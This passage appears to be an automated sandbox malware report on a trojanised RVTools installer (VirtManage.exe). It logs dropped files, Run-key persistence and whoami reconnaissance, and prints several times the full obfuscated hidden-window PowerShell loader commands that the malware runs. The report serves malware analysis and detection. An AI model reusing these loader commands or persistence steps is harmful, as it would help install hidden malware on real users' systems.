Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
Source: C:\Windows\SysWOW64\msiexec.exeWindow detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: VirtManage.exeStatic PE information: certificate valid
Source: VirtManage.exeStatic file information: File size 10539568 > 1048576
Source: VirtManage.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmp, MSI2C66.tmp.9.dr, MSI2CE4.tmp.9.dr
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb= source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmp, MSI2C66.tmp.9.dr, MSI2CE4.tmp.9.dr
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.pdbhP source: powershell.exe, 00000017.00000002.3346373467.000001E94D185000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: OLEView.pdb source: VirtManage.exe, 00000000.00000003.1057102558.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003269172.0000019A67F9A000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003355674.0000019A67F6A000.00000004.00001000.00020000.00000000.sdmp, winapi.exe, 00000016.00000000.1065914893.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 00000016.00000002.3343867097.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 0000001A.00000000.1193119385.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe, 0000001A.00000002.3342445640.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe.16.dr, winapi.exe.0.dr
Source: Binary string: 2C:\Users\user\AppData\Local\Temp\e3jseyke.pdbhP source: powershell.exe, 0000001B.00000002.3345599262.00000234BD87C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: OLEView.pdbGCTL source: VirtManage.exe, 00000000.00000003.1057102558.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003269172.0000019A67F9A000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003355674.0000019A67F6A000.00000004.00001000.00020000.00000000.sdmp, winapi.exe, 00000016.00000000.1065914893.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 00000016.00000002.3343867097.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 0000001A.00000000.1193119385.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe, 0000001A.00000002.3342445640.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe.16.dr, winapi.exe.0.dr
Source: Binary string: 2C:\Users\user\AppData\Local\Temp\e3jseyke.pdb source: powershell.exe, 0000001B.00000002.3345599262.00000234BD87C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.pdb source: powershell.exe, 00000017.00000002.3346373467.000001E94D185000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Obfuscated command line found
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}"
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"Jump to behavior
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}"
Suspicious powershell command line found
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}"
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"Jump to behavior
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e3jseyke.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e3jseyke.cmdline"
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004014F0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004014F0
Source: libgcrypt-20.dll.0.drStatic PE information: section name: /4
Source: libgpg-error-0.dll.0.drStatic PE information: section name: /4
Source: libnpth-0.dll.0.drStatic PE information: section name: /4
Source: libsqlite3-0.dll.0.drStatic PE information: section name: /4
Source: zlib1.dll.0.drStatic PE information: section name: /4
Source: gpg-agent.exe.0.drStatic PE information: section name: /4
Source: gpg.exe.0.drStatic PE information: section name: /4
Source: libassuan-9.dll.0.drStatic PE information: section name: /4
Source: winapi.exe.0.drStatic PE information: section name: fothk
Source: aclui.dll.0.drStatic PE information: section name: .xdata
Source: aclui.dll.0.drStatic PE information: section name: /4
Source: aclui.dll.0.drStatic PE information: section name: /19
Source: aclui.dll.0.drStatic PE information: section name: /31
Source: aclui.dll.0.drStatic PE information: section name: /45
Source: aclui.dll.0.drStatic PE information: section name: /57
Source: aclui.dll.0.drStatic PE information: section name: /70
Source: aclui.dll.0.drStatic PE information: section name: /81
Source: aclui.dll.0.drStatic PE information: section name: /97
Source: aclui.dll.0.drStatic PE information: section name: /113
Source: aclui-2.dll.16.drStatic PE information: section name: .xdata
Source: aclui-2.dll.16.drStatic PE information: section name: /4
Source: aclui-2.dll.16.drStatic PE information: section name: /19
Source: aclui-2.dll.16.drStatic PE information: section name: /31
Source: aclui-2.dll.16.drStatic PE information: section name: /45
Source: aclui-2.dll.16.drStatic PE information: section name: /57
Source: aclui-2.dll.16.drStatic PE information: section name: /70
Source: aclui-2.dll.16.drStatic PE information: section name: /81
Source: aclui-2.dll.16.drStatic PE information: section name: /97
Source: aclui-2.dll.16.drStatic PE information: section name: /113
Source: aclui.dll.16.drStatic PE information: section name: .xdata
Source: aclui.dll.16.drStatic PE information: section name: /4
Source: aclui.dll.16.drStatic PE information: section name: /19
Source: aclui.dll.16.drStatic PE information: section name: /31
Source: aclui.dll.16.drStatic PE information: section name: /45
Source: aclui.dll.16.drStatic PE information: section name: /57
Source: aclui.dll.16.drStatic PE information: section name: /70
Source: aclui.dll.16.drStatic PE information: section name: /81
Source: aclui.dll.16.drStatic PE information: section name: /97
Source: aclui.dll.16.drStatic PE information: section name: /113
Source: winapi.exe.16.drStatic PE information: section name: fothk
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0049816A push 89FFF8EBh; ret 1_2_00498179
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0049816A push 89FFF8EBh; ret 3_2_00498179
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg-agent.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\libassuan-9.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI2C66.tmpJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\e3jseyke.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\libgcrypt-20.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\libnpth-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\libsqlite3-0.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\Users\user\AppData\Local\Temp\nsrFD0A.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\UpdateDesktop\aclui.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI2CE4.tmpJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\libgpg-error-0.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\zlib1.dllJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\aclui.dllJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\aclui-2.dllJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\Users\user\AppData\Local\Temp\nsrFD0A.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg-agent.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\libassuan-9.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\libgcrypt-20.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\libnpth-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\libsqlite3-0.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\UpdateDesktop\aclui.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\libgpg-error-0.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\zlib1.dllJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\aclui.dllJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\aclui-2.dllJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeJump to dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeFile created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeJump to dropped file

Boot Survival

barindex
Uses whoami command line tool to query computer and username
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Users\user\Desktop\VirtManage.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateOleviewJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateOleviewJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demand

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
